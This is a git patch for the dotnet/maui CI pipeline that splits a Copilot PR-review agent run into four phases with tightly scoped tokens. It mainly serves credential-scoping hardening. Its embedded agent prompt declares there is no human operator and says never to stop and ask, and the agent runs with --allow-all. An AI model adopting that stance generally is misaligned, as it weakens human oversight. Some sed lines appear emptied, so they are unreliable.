From 7d87222f7808e73fce32c5f8544fe2305e5481b8 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:48:42 +0200 Subject: [PATCH 01/34] [CI] Refactor ci-copilot pipeline: scope env vars per task MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Split the monolithic 'Run PR Reviewer Agent' bash task into 4 sequential tasks, each with exactly the env vars it needs: Task 1 (Setup): GH_TOKEN only — branch checkout, PR merge Task 2 (Gate): NO tokens — dotnet build/test, gate verification Task 3 (CopilotReview): COPILOT_GITHUB_TOKEN — expert review + try-fix Task 4 (Post): GH_TOKEN only — comments, labels, summary Review-PR.ps1 gains -Phase (Setup|Gate|CopilotReview|Post) and -TrustedScriptsDir parameters so each pipeline task invokes a single phase. Backward-compatible: omitting -Phase runs all steps sequentially. Security improvements: - persistCredentials: false (credentials no longer available to all tasks) - Removed gh auth login step (GH_TOKEN used directly as env var) - --secret-env-vars strips tokens from copilot subprocess environments - Trusted scripts copied once in Setup, reused by all phases - PRNumber type changed to 'number' for AzDO parameter validation Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 228 +++++++++++++++++++++++--------- eng/pipelines/ci-copilot.yml | 238 +++++++++++++++++++++------------- 2 files changed, 312 insertions(+), 154 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3bce923e2ddc..352934935b61 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -50,6 +50,13 @@ param( [ValidateSet('android', 'ios', 'windows', 'maccatalyst', 'catalyst')] [string]$Platform, + [Parameter(Mandatory = $false)] + [ValidateSet('Setup', 'Gate', 'CopilotReview', 'Post')] + [string]$Phase, + + [Parameter(Mandatory = $false)] + [string]$TrustedScriptsDir, + [Parameter(Mandatory = $false)] [switch]$UseCurrentBranch, @@ -63,6 +70,13 @@ param( $ErrorActionPreference = 'Stop' if ($LogFile) { + # When running with -Phase, each phase is a separate process writing to the same log. + # Append a phase suffix so phases don't overwrite each other's logs. + if ($Phase) { + $logExt = [System.IO.Path]::GetExtension($LogFile) + $logBase = $LogFile.Substring(0, $LogFile.Length - $logExt.Length) + $LogFile = "${logBase}_${Phase}${logExt}" + } $logDir = Split-Path $LogFile -Parent if ($logDir -and -not (Test-Path $logDir)) { New-Item -ItemType Directory -Path $logDir -Force | Out-Null @@ -73,6 +87,28 @@ if ($LogFile) { $RepoRoot = git rev-parse --show-toplevel 2>$null if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } +# ─── Phase routing ───────────────────────────────────────────────────────────── +# When -Phase is specified, run ONLY that phase. This enables the 4-task AzDO +# split where each task calls Review-PR.ps1 with a different phase, each with +# exactly the secrets it needs in its env: block. +# +# Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. +# Task 2 (Gate): env: . dotnet build/test only. +# Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). +# Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. +# +# When -Phase is NOT specified, all steps run sequentially (backward compat for +# local development use). +$runSetup = -not $Phase -or $Phase -eq 'Setup' +$runGate = -not $Phase -or $Phase -eq 'Gate' +$runCopilotReview = -not $Phase -or $Phase -eq 'CopilotReview' +$runPost = -not $Phase -or $Phase -eq 'Post' + +# Resolve the scripts directory — use TrustedScriptsDir if provided (CI), +# otherwise use the repo's own .github/ directory (local dev). +$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } + # ─── Banner ─────────────────────────────────────────────────────────────────── Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan @@ -87,7 +123,25 @@ if ($Platform) { Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan Write-Host "" +# ─── Shared variables (available to all phases) ────────────────────────────── +$platformInstruction = if ($Platform) { + "**Platform for testing:** $Platform" +} else { + "**Platform for testing:** Determine from PR's affected code paths and current host OS." +} + +$autonomousRules = @" + +🚨 **AUTONOMOUS EXECUTION:** +- There is NO human operator - NEVER stop and ask for input +- On environment blockers: skip the blocked phase and continue +- Always prefer CONTINUING with partial results over STOPPING +"@ + +$reviewBranch = "pr-review-$PRNumber" + # ─── Prerequisites ──────────────────────────────────────────────────────────── +if ($runSetup) { Write-Host "📋 Checking prerequisites..." -ForegroundColor Yellow $ghVersion = gh --version 2>$null | Select-Object -First 1 @@ -104,21 +158,6 @@ $prInfo = gh pr view $PRNumber --json title,state 2>$null | ConvertFrom-Json if (-not $prInfo) { Write-Error "PR #$PRNumber not found"; exit 1 } Write-Host " ✅ PR: $($prInfo.title)" -ForegroundColor Green -# ─── Shared prompt rules ───────────────────────────────────────────────────── -$platformInstruction = if ($Platform) { - "**Platform for testing:** $Platform" -} else { - "**Platform for testing:** Determine from PR's affected code paths and current host OS." -} - -$autonomousRules = @" - -🚨 **AUTONOMOUS EXECUTION:** -- There is NO human operator - NEVER stop and ask for input -- On environment blockers: skip the blocked phase and continue -- Always prefer CONTINUING with partial results over STOPPING -"@ - # ═════════════════════════════════════════════════════════════════════════════ # STEP 1: Branch Setup (Create Review Branch & Cherry-Pick PR) # ═════════════════════════════════════════════════════════════════════════════ @@ -128,8 +167,6 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 1: BRANCH SETUP ║" -ForegroundColor Yellow Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow -$reviewBranch = "pr-review-$PRNumber" - if ($DryRun) { if ($UseCurrentBranch) { Write-Host "[DRY RUN] Would create review branch '$reviewBranch' from current branch" -ForegroundColor Magenta @@ -275,6 +312,24 @@ if ($DryRun) { Write-Host " 📝 HEAD: $headCommit" -ForegroundColor Gray } +} # end if ($runSetup) + +# End of Setup phase — write sentinel and exit early +if ($Phase -eq 'Setup') { + # Sentinel signals to Tasks 2-4 that Setup completed successfully (PR merged). + $sentinelDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + New-Item -ItemType Directory -Force -Path $d | Out-Null + $d + } + "OK" | Set-Content (Join-Path $sentinelDir "setup-complete") -Encoding UTF8 + Write-Host "✅ Setup phase complete" -ForegroundColor Green + if ($LogFile) { Stop-Transcript -ErrorAction SilentlyContinue | Out-Null } + exit 0 +} + # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows @@ -467,10 +522,12 @@ function Invoke-CopilotStep { } # Use JSON output format to stream live progress of agent activity. + # --secret-env-vars: defense-in-depth — strips named tokens from copilot's + # shell/MCP subprocess env even if they somehow appear (e.g., via variable groups). # Model is overridable via $env:COPILOT_REVIEW_MODEL so contributors without internal-model access # can run this script (e.g., with 'claude-opus-4.6' or 'claude-sonnet-4.6'). $copilotModel = if ($env:COPILOT_REVIEW_MODEL) { $env:COPILOT_REVIEW_MODEL } else { 'gpt-5.5' } - & copilot -p $Prompt --allow-all --output-format json --model $copilotModel 2>&1 | ForEach-Object { + & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { $line = $_.ToString() try { $event = $line | ConvertFrom-Json -ErrorAction Stop @@ -613,6 +670,8 @@ function Invoke-CopilotStep { # STEP 2: DETECT UI Test Categories (detection only — no pipeline trigger) # ═════════════════════════════════════════════════════════════════════════════ +if ($runGate) { + Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan Write-Host "║ STEP 2: DETECT UI TEST CATEGORIES ║" -ForegroundColor Cyan @@ -704,7 +763,7 @@ Write-Host "║ STEP 3: RUN DETECTED UI TESTS ║" - Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $uitestRunResult = "SKIPPED" -$uitestRunnerScript = Join-Path $PSScriptRoot "BuildAndRunHostApp.ps1" +$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" if ($uitestCategories -eq 'NONE') { Write-Host " ⏭️ Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray @@ -743,7 +802,7 @@ if ($uitestCategories -eq 'NONE') { # turning into "119 OneTimeSetUp timeouts" in the AI summary. $catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log") $catStart = Get-Date - $sharedRunner = Join-Path $PSScriptRoot "shared/Invoke-UITestWithRetry.ps1" + $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1" $runResult = $null $testOutput = @() $testExitCode = -1 @@ -867,7 +926,7 @@ if ($uitestCategories -eq 'NONE') { # If $envErrHit was set above, use that — the retry loop already # detected an env error and exhausted retries. # Load shared env-error patterns (single source of truth). - $sharedPatternsScript = Join-Path $PSScriptRoot "shared/Get-EnvErrorPatterns.ps1" + $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1" if (Test-Path $sharedPatternsScript) { . $sharedPatternsScript $infraSignals = Get-EnvErrorPatterns @@ -1144,7 +1203,7 @@ Write-Host "║ STEP 4: REGRESSION CROSS-REFERENCE ║" -F Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check" -$regressionScript = Join-Path $PSScriptRoot "Find-RegressionRisks.ps1" +$regressionScript = Join-Path $ScriptsDir "Find-RegressionRisks.ps1" if (Test-Path $regressionScript) { try { & $regressionScript -PRNumber $PRNumber -OutputDir $regressionOutputDir @@ -1348,7 +1407,7 @@ New-Item -ItemType Directory -Force -Path $gateOutputDir | Out-Null # Detect tests in PR Write-Host " 🔍 Detecting tests in PR #$PRNumber..." -ForegroundColor Cyan -$testDetectScript = Join-Path $PSScriptRoot "shared/Detect-TestsInDiff.ps1" +$testDetectScript = Join-Path $ScriptsDir "shared/Detect-TestsInDiff.ps1" if (Test-Path $testDetectScript) { $testDetectScript = (Resolve-Path $testDetectScript).Path & pwsh -NoProfile -File $testDetectScript -PRNumber $PRNumber 2>&1 | ForEach-Object { Write-Host " $_" } @@ -1360,7 +1419,7 @@ if (Test-Path $testDetectScript) { $gatePlatform = if ($Platform) { $Platform } else { "android" } Write-Host " 🧪 Running gate on platform: $gatePlatform" -ForegroundColor Cyan -$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $PSScriptRoot "../skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1")) +$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $SkillsDir "verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1")) if (-not (Test-Path $verifyScript)) { Write-Host " ❌ verify-tests-fail.ps1 not found at: $verifyScript" -ForegroundColor Red # $gateExitCode = 1 ensures the switch at line ~561 produces $gateResult = "FAILED" @@ -1571,47 +1630,34 @@ $gateLogTail } } -# Post gate result as a separate PR comment -$postGateScript = Join-Path $PSScriptRoot "post-gate-comment.ps1" -if (Test-Path $postGateScript) { - try { - if ($DryRun) { - & $postGateScript -PRNumber $PRNumber -DryRun - } else { - & $postGateScript -PRNumber $PRNumber - } - } catch { - Write-Host " ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow - } +# Persist gate result so other phases can read it +$gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent } else { - Write-Host " ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow + $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + New-Item -ItemType Directory -Force -Path $d | Out-Null + $d } +$gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8 +Write-Host " 📄 Gate result persisted: $gateResult" -ForegroundColor Gray -# Apply gate result label -$gatePassLabel = "s/agent-gate-passed" -$gateFaillabel = "s/agent-gate-failed" -$gateSkipLabel = "s/agent-gate-skipped" -$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel) +} # end if (-not $skipGateAndTryFix) -$addLabel = switch ($gateResult) { - "PASSED" { $gatePassLabel } - "SKIPPED" { $gateSkipLabel } - default { $gateFaillabel } -} -$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel } +} # end if ($runGate) -if (-not $DryRun) { - foreach ($lbl in $removeLabels) { - gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null - } - gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null - if ($LASTEXITCODE -eq 0) { - Write-Host " 🏷️ Label: $addLabel" -ForegroundColor Cyan +# ─── Phase: CopilotReview ────────────────────────────────────────────────── +if ($runCopilotReview) { + +# Restore gate result from file when running in phased mode +if ($Phase -eq 'CopilotReview') { + $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + if (Test-Path $gateVerdictFile) { + $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() + Write-Host " 📄 Restored gate result: $gateResult" -ForegroundColor Gray } else { - Write-Host " ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow + $gateResult = "SKIPPED" + Write-Host " ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow } -} else { - Write-Host " [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta } # Restore review branch @@ -1804,7 +1850,7 @@ git checkout $reviewBranch 2>$null | Out-Null # Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the # unified comment reflects all three tiers before Step 7 posts. $aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md" -if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { +if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { try { # Pass as a single string (the script declares [string]$AiCategories); # an array would not bind correctly across the pwsh -File boundary. @@ -1864,7 +1910,63 @@ if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { } } -} # END TEMP SKIP wrapper for STEP 5 (Gate) + STEP 6 (Try-Fix) — see $skipGateAndTryFix above +} # end if ($runCopilotReview) + +# ─── Phase: Post ──────────────────────────────────────────────────────────── +if ($runPost) { + +# Restore gate result from file when running in phased mode +if ($Phase -eq 'Post') { + $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + if (Test-Path $gateVerdictFile) { + $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() + } else { + $gateResult = "SKIPPED" + } +} + +# ─── Gate posting (moved here so only the Post task needs GH_TOKEN) ────── +$postGateScript = Join-Path $ScriptsDir "post-gate-comment.ps1" +if (Test-Path $postGateScript) { + try { + if ($DryRun) { + & $postGateScript -PRNumber $PRNumber -DryRun + } else { + & $postGateScript -PRNumber $PRNumber + } + } catch { + Write-Host " ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow + } +} else { + Write-Host " ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow +} + +# Apply gate result label +$gatePassLabel = "s/agent-gate-passed" +$gateFaillabel = "s/agent-gate-failed" +$gateSkipLabel = "s/agent-gate-skipped" +$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel) + +$addLabel = switch ($gateResult) { + "PASSED" { $gatePassLabel } + "SKIPPED" { $gateSkipLabel } + default { $gateFaillabel } +} +$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel } + +if (-not $DryRun) { + foreach ($lbl in $removeLabels) { + gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null + } + gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null + if ($LASTEXITCODE -eq 0) { + Write-Host " 🏷️ Label: $addLabel" -ForegroundColor Cyan + } else { + Write-Host " ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow + } +} else { + Write-Host " [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta +} # ═════════════════════════════════════════════════════════════════════════════ # STEP 7: Post AI Summary Comment (direct script invocation) @@ -1877,7 +1979,7 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 7: POST AI SUMMARY ║" -ForegroundColor Magenta Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta -$summaryScriptsDir = Join-Path $RepoRoot ".github/scripts" +$summaryScriptsDir = $ScriptsDir if ($env:DEFER_COMMENT_TO_STAGE3 -eq 'true') { Write-Host " ⏭️ Deferred to Stage 3 (DEFER_COMMENT_TO_STAGE3=true)" -ForegroundColor Gray @@ -2064,7 +2166,7 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 8: APPLY LABELS ║" -ForegroundColor Blue Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue -$labelHelperPath = Join-Path $RepoRoot ".github/scripts/shared/Update-AgentLabels.ps1" +$labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1" if (Test-Path $labelHelperPath) { try { . $labelHelperPath @@ -2077,6 +2179,8 @@ if (Test-Path $labelHelperPath) { Write-Host " ⚠️ Label helper not found — skipping" -ForegroundColor Yellow } +} # end if ($runPost) + # ═════════════════════════════════════════════════════════════════════════════ # Cleanup # ═════════════════════════════════════════════════════════════════════════════ diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 0f5e04b72231..890fe6d59942 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -12,8 +12,7 @@ pr: none # Not triggered by PRs parameters: - name: PRNumber displayName: 'Pull Request Number' - type: string - default: '' + type: number - name: Platform displayName: 'Target Platform' @@ -80,7 +79,10 @@ stages: steps: - checkout: self fetchDepth: 0 - persistCredentials: true + persistCredentials: false + # persistCredentials is false — tasks that need GitHub access + # (Setup, Post) use GH_TOKEN env var instead. This limits the + # blast radius: Gate and CopilotReview tasks cannot push to the repo. # Validate Parameters # PRNumber is received via env var to avoid compile-time shell injection. @@ -376,24 +378,11 @@ stages: echo "GitHub CLI ready" displayName: 'Install GitHub CLI' - - bash: | - echo "Authenticating with GitHub CLI..." - if [ -z "$GH_TOKEN" ]; then - echo "##vso[task.logissue type=error]GH_TOKEN env var (from pipeline variable GH_COMMENT_TOKEN) is not set. Please configure the pipeline variable." - exit 1 - fi - gh auth status - if [ $? -ne 0 ]; then - echo "$GH_TOKEN" | gh auth login --with-token 2>/dev/null || true - if ! gh auth status; then - echo "##vso[task.logissue type=error]GitHub CLI authentication failed" - exit 1 - fi - fi - echo "GitHub CLI authenticated successfully" - displayName: 'Authenticate GitHub CLI' - env: - GH_TOKEN: $(GH_COMMENT_TOKEN) + # NOTE: Removed `gh auth login` step. With the phased task design, + # GH_TOKEN is passed as an env var only to Setup and Post tasks, and + # `gh` uses GH_TOKEN directly without needing `gh auth login`. This + # avoids persisting credentials in the agent's gh auth store where + # Gate and CopilotReview tasks could access them. - bash: | echo "Installing GitHub Copilot CLI..." @@ -575,16 +564,16 @@ stages: timeoutInMinutes: 6 retryCountOnTaskFailure: 2 + # ───────────────────────────────────────────────────────── + # Task 1 — SETUP: symlink copilot, git config, env prep, + # copy trusted scripts, invoke Review-PR.ps1 -Phase Setup + # env: GH_TOKEN (for branch checkout / PR merge) + # ───────────────────────────────────────────────────────── - bash: | - echo "Running Copilot PR Reviewer Agent via Review-PR.ps1..." - echo "Reviewing PR #${{ parameters.PRNumber }}..." + echo "═══ TASK 1: SETUP ═══" + # Ensure copilot CLI is accessible to pwsh subprocess. - # npm global install on Linux goes to UseNode@1 toolcache path which may not - # be on PATH inside pwsh even when exported from bash. Create a symlink in - # /usr/local/bin (Unix) or verify PATH (Windows). if [[ "$(uname -o 2>/dev/null || uname -s)" == *"Msys"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"Windows"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"MINGW"* ]]; then - # Windows (Git Bash): npm global bin is usually already on PATH - echo "Windows detected — verifying copilot is on PATH..." COPILOT_PATH=$(which copilot 2>/dev/null || true) echo "copilot location: ${COPILOT_PATH:-not found}" if [ -z "$COPILOT_PATH" ]; then @@ -592,7 +581,6 @@ stages: exit 1 fi else - # Linux/macOS: symlink to /usr/local/bin COPILOT_PATH=$(which copilot 2>/dev/null || find /opt/hostedtoolcache/node -name copilot -type f 2>/dev/null | head -1) if [ -n "$COPILOT_PATH" ] && [ ! -f /usr/local/bin/copilot ]; then sudo ln -sf "$COPILOT_PATH" /usr/local/bin/copilot @@ -605,84 +593,144 @@ stages: exit 1 fi fi - # Verify pwsh can find it pwsh -NoProfile -c 'Write-Host "pwsh sees copilot at: $(Get-Command copilot -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Source)"' - - # Configure git identity (required for merge operations on self-hosted agents) + + # Configure git identity git config user.email "copilot-ci@microsoft.com" git config user.name "Copilot CI" - echo "Git identity configured" - - # Create Directory.Build.Override.props to skip Xcode version check (not needed on Windows) + + # Create Directory.Build.Override.props cp Directory.Build.Override.props.in Directory.Build.Override.props if [[ "$(uname)" == "Linux" ]]; then sed -i 's|| false\n|' Directory.Build.Override.props elif [[ "$(uname)" == "Darwin" ]]; then sed -i '' 's|| false\n|' Directory.Build.Override.props else - # Windows (Git Bash) — GNU sed, same as Linux sed -i 's|| false\n|' Directory.Build.Override.props fi - - # Create artifacts directory for Copilot outputs + + # Create artifacts directory mkdir -p $(Build.ArtifactStagingDirectory)/copilot-logs - - # Invoke the PR reviewer using our PowerShell script - # The script will merge the PR into the current branch - # -PostSummaryComment and -RunFinalize handle posting comments - echo "Review platform: ${{ parameters.Platform }}" - + + # Copy trusted scripts from the checked-out commit so later tasks + # (which may be on a merged/modified worktree) use the same .github/ + # files that were reviewed and approved on main. + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + mkdir -p "$TRUSTED" + cp -r .github/scripts "$TRUSTED/scripts" + cp -r .github/skills "$TRUSTED/skills" + echo "Trusted scripts copied to $TRUSTED" + + # Run Setup phase (branch checkout + PR merge) set +e - pwsh -NoProfile .github/scripts/Review-PR.ps1 -PRNumber "${PARAM_PR_NUMBER}" -Platform "${{ parameters.Platform }}" -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" - COPILOT_EXIT_CODE=$? + pwsh -NoProfile .github/scripts/Review-PR.ps1 \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Setup \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + SETUP_EXIT=$? set -e - - echo "Review-PR.ps1 exit code: $COPILOT_EXIT_CODE" - - # Terminate any orphaned copilot CLI processes that could hold this step's - # stdout fd open and prevent the bash step from exiting. - # Only target processes whose command line includes the copilot CLI path. - echo "Cleaning up orphaned copilot processes..." - SELF_PID=$$ - for proc in $(pgrep -f "[c]opilot" 2>/dev/null || true); do - if [ -n "$proc" ] && [ "$proc" != "$SELF_PID" ]; then - PROC_CMD=$(ps -p "$proc" -o args= 2>/dev/null || true) - if echo "$PROC_CMD" | grep -q "copilot"; then - echo " Stopping copilot process $proc: $PROC_CMD" - kill "$proc" 2>/dev/null || true - fi - fi - done - - # Copy any Copilot session files (bash — works on Linux/macOS) - if [ -d "$HOME/.copilot" ]; then - echo "Copying Copilot session state..." - cp -r "$HOME/.copilot" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot-session-state || true - fi - - # Check for failure indicators in output - if [ $COPILOT_EXIT_CODE -ne 0 ]; then - echo "##vso[task.logissue type=error]Review-PR.ps1 exited with code $COPILOT_EXIT_CODE" - # Don't exit yet - let artifacts be published first + + if [ $SETUP_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]Setup phase failed with exit code $SETUP_EXIT" echo "##vso[task.setvariable variable=CopilotFailed]true" fi - - # Check output for common failure patterns - if grep -qi "error\|failed\|exception" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then - if grep -qi "simulator.*not\|emulator.*not\|workload.*not\|sdk.*not found" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then - echo "##vso[task.logissue type=warning]Copilot encountered environment issues. Check artifacts for details." - fi + name: RunSetup + displayName: 'Task 1: Setup (branch + merge)' + env: + GH_TOKEN: $(GH_COMMENT_TOKEN) + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} + + # ───────────────────────────────────────────────────────── + # Task 2 — GATE: UI detection, test runs, regression, + # gate verification. NO tokens — only dotnet/build tools. + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 2: GATE ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Gate \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + GATE_EXIT=$? + set -e + + if [ $GATE_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=warning]Gate phase exited with code $GATE_EXIT" + echo "##vso[task.setvariable variable=GateFailed]true" fi - - echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunReview # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.']) - displayName: 'Run PR Reviewer Agent' + name: RunGate + displayName: 'Task 2: Gate (test verification)' + env: + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} + + # ───────────────────────────────────────────────────────── + # Task 3 — COPILOT REVIEW: expert review + try-fix. + # env: COPILOT_GITHUB_TOKEN (for copilot agent). + # NO GH_TOKEN — the agent can't push or post comments. + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 3: COPILOT REVIEW ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + echo "Review platform: ${{ parameters.Platform }}" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase CopilotReview \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + REVIEW_EXIT=$? + set -e + + if [ $REVIEW_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]CopilotReview phase failed with exit code $REVIEW_EXIT" + echo "##vso[task.setvariable variable=CopilotFailed]true" + fi + name: RunReview + displayName: 'Task 3: Copilot Review (expert review + try-fix)' env: COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - GH_TOKEN: $(GH_COMMENT_TOKEN) DEVICE_UDID: $(DEVICE_UDID) PARAM_PR_NUMBER: ${{ parameters.PRNumber }} COMMENTS_VIA_FILE: "true" + + # ───────────────────────────────────────────────────────── + # Task 4 — POST: gate comment, AI summary, labels. + # env: GH_TOKEN (for posting comments). + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 4: POST ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Post \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + POST_EXIT=$? + set -e + + if [ $POST_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]Post phase failed with exit code $POST_EXIT" + echo "##vso[task.setvariable variable=CopilotFailed]true" + fi + + echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" + name: RunPost # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.']) + displayName: 'Task 4: Post (comments + labels)' + env: + GH_TOKEN: $(GH_COMMENT_TOKEN) + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} DEFER_COMMENT_TO_STAGE3: "true" # Copy review artifacts into the CopilotLogs staging dir. @@ -734,13 +782,19 @@ stages: publishLocation: 'pipeline' condition: and(succeededOrFailed(), ne(variables['LogDirectory'], '')) - # Fail the pipeline if Copilot failed + # Fail the pipeline if any phase failed - bash: | + FAILED=0 if [ "$(CopilotFailed)" = "true" ]; then echo "##vso[task.logissue type=error]Copilot PR review failed. Check CopilotLogs artifact for details." - exit 1 + FAILED=1 + fi + if [ "$(GateFailed)" = "true" ]; then + echo "##vso[task.logissue type=warning]Gate phase failed — test verification did not pass." + FAILED=1 fi - displayName: 'Check Copilot Result' + exit $FAILED + displayName: 'Check Review Result' condition: succeededOrFailed() # ───────────────────────────────────────────────────────────────────────────── @@ -767,12 +821,12 @@ stages: - stage: RunDeepUITests displayName: 'Deep UI Tests (platform pool)' dependsOn: ReviewPR - condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), 